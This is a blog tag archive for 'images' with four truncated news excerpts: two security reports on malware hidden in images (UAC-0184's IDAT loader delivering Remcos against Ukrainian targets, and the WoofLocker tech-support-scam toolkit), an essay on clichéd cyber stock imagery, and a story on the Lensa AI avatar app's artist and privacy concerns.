Tag Archive for: images

Hacker group hides malware in images to target Ukrainian organizations

/in


A group of attackers targeting Ukraine-affiliated organizations has been delivering malicious payloads hidden within the pixels of image files. Known as steganography, it is just one of many advanced techniques the group uses to evade detection as part of a malware loader known as IDAT.

Tracked as UAC-0184 by several security firms, as well as the Computer Emergency Response Team of Ukraine (CERT-UA), the group was seen targeting Ukrainian servicemen via phishing emails masquerading as messages from Ukraine’s ​​3rd Separate Assault Brigade and the Israeli Defense Forces (IDF). While most of the recipients of these messages were located in Ukraine, security firm Morphisec has confirmed targets outside of the country as well.

“While the adversary strategically targeted Ukraine-based entities, they apparently sought to expand to additional entities affiliated with Ukraine,” researchers said in a new report. “Morphisec findings brought to the forefront a more specific target — Ukraine entities based in Finland.” Morphisec also observed the new steganography approach in delivering malicious payloads after the initial compromise.

Staged malware injection ends with Remcos trojan

The attacks detected by Morphisec delivered a malware loader known as IDAT or HijackLoader that has been used in the past to deliver a variety of trojans and malware programs including Danabot, SystemBC, and RedLine Stealer. In this case, UAC-0184 used it to deploy a commercial remote access trojan (RAT) program called Remcos.

“Distinguished by its modular architecture, IDAT employs unique features like code injection and execution modules, setting it apart from conventional loaders,” the Morphisec researchers said. “It employs sophisticated techniques such as dynamic loading of Windows API functions, HTTP connectivity tests, process blocklists, and syscalls to evade detection. The infection process of IDAT unfolds in multiple stages, each serving distinct functionalities.”

The infection happens in stages, with the first stage making a call to a remote URL to access a .js (JavaScript) file. The code in this file tells the executable where to look for an…

Source…

WoofLocker Toolkit Hides Malicious Codes in Images to Run Tech Support Scams

/in


Aug 19, 2023THNMalvertising / Website Security

Cybersecurity researchers have detailed an updated version of an advanced fingerprinting and redirection toolkit called WoofLocker that’s engineered to conduct tech support scams.

The sophisticated traffic redirection scheme was first documented by Malwarebytes in January 2020, leveraging JavaScript embedded in compromised websites to perform anti-bot and web traffic filtering checks to serve next-stage JavaScript that redirects users to a browser locker (aka browlock).

This redirection mechanism, in turn, makes use of steganographic tricks to conceal the JavaScript code within a PNG image that’s served only when the validation phase is successful. Should a user be detected as a bot or not interesting traffic, a decoy PNG file without the malicious code is used.

WoofLocker is also known as 404Browlock due to the fact that visiting the browlock URL directly without the appropriate redirection or one-time session token results in a 404 error page.

The cybersecurity firm’s latest analysis shows that the campaign is still ongoing.

Cybersecurity

“The tactics and techniques are very similar, but the infrastructure is now more robust than before to defeat potential takedown attempts,” Jérôme Segura, director of threat intelligence at Malwarebytes, said.

“It is just as difficult to reproduce and study the redirection mechanism now as it was then, especially in light of new fingerprinting checks” to detect the presence of virtual machines, certain browser extensions, and security tools.

A majority of the sites loading WoofLocker are adult websites, with the infrastructure using hosting providers in Bulgaria and Ukraine that give the threat actors stronger protection against takedowns.

The primary goal of browser lockers is to get targeted victims to call for assistance to resolve (non-existent) computer problems and gain remote control over the computer to draft an invoice that recommends affected individuals to pay for a security solution to address the problem.

“This is handled by third-parties via fraudulent call centers,” Segura noted back in 2020. “The threat actor behind the traffic redirection and browlock will get paid for each successful…

Source…

The hooded man at the computer: What are cyber images telling us?

/in


Have you read an article about cyber this year? Perhaps it was about the taking down of Ukrainian government websites at the beginning of Russia’s invasion or the Conti ransomware attack on Costa Rica that led the government to declare a national emergency. Do you remember what image accompanied the article? And more importantly, do you think the image effectively communicated what the article was about?

Back in the mid-2010s, I worked at a think tank that was looking into new ways of warfare, such as the use of drones and cyber attacks. When trying to find images to accompany reports or articles on the topic of cyber, I encountered a problem. Online image searches pulled up image upon image that all looked the same: rows of 1’s and 0’s raining down in green and blue, a padlock, a close-up of a keyboard, or a hooded man in front of a computer. Fast forward to 2022, the ELN’s nuclear and new tech project is exploring the impact of new technologies on nuclear decision-making, and the same problem persists. While the importance of new technologies for conflict and international security has only grown in the past decade, the images used to represent them have remained static, and this hampers our ability to understand these issues and imagine the effects they may have on our future.


While the importance of new technologies for conflict and security has only grown in the past decade, the images used to represent them have remained static.
Esther Kersley

One new technology that is having a significant impact on international relations, and has received growing attention in the media, is cyber. From the 2007 ‘Nashi’ attack on the Estonian government, the 2010 ‘Stuxnet’ attack targeting Iran’s nuclear program, to Edward Snowdon’s NSA data heist in 2013 and Russia’s attack on the 2016 US presidential election, cyberspace has been described as “a global battlefield of the 21st century”. For the past few years, it has been high up on the US’s official list of national security threats, and tops the list of most European states, including the UK.

Despite its growing importance, cyber (like other new technologies) is complex and intangible and remains poorly…

Source…

AI images take social media by storm, there may be more to it than meets the eye

/in


BLOOMINGTON — Leito Navarrete has spent his whole life sharpening his craft.

“Fragmentation, collage, composition. I take a lot of inspiration from street art and graffiti,” Navarrete said.

But the Indiana University Graduate Student is concerned about the future of his industry.

“Almost every other image, or at least one in five images, scrolling down on Instagram is a Lensa portrait,” Navarette said.

On Thursday, Lensa AI is the most popular app in the U.S. on Apple’s App Store.

The app, produced by Prisma Labs, Inc., uses an open-source neural network model called Stable Diffusion to create computer-generated images.

Some like Navarrete argue that model takes artists’ material without their consent in the process.

“The most problematic part about this technology, aside from copyright and theft, is making a profit off of this kind of software,” he said.

The app asks you to upload 10 to 20 selfies and then pay a fee of $7.99 to $15.99, depending on the number of variations and styles you’d like.

When it’s done, you’re left with dozens, even hundreds of “magic avatars”.

Senior Editor of Security at Wired Andrew Couts says the app may pose cyber security risks.

“The main thing I would be concerned about is the behavioral analytics that they’re collecting. if I were going to use the app, I would make sure to turn on as restrictive privacy settings as possible,” Couts said.

According to the app, photos are immediately deleted from its servers after the Avatars are ready.

Regardless, Couts says to be cautious.

“You can change your privacy settings on your phone to make sure that the app isn’t collecting as much data as it seems to be able to. And you can make sure that you’re not sharing images that contain anything more private than just your face,” Couts said.

As for Navarrete, he hopes consumers will support local artists as much as these apps.

“I think it will become more challenging, even more so than it already is, to make a living as a painter and as an artist. To justify your field of work, expertise and what you can bring to the table,” Navarette said.

WRTV emailed Prisma Labs and a spokesperson directed us to a FAQ with detailed information on the app.

On…

Source…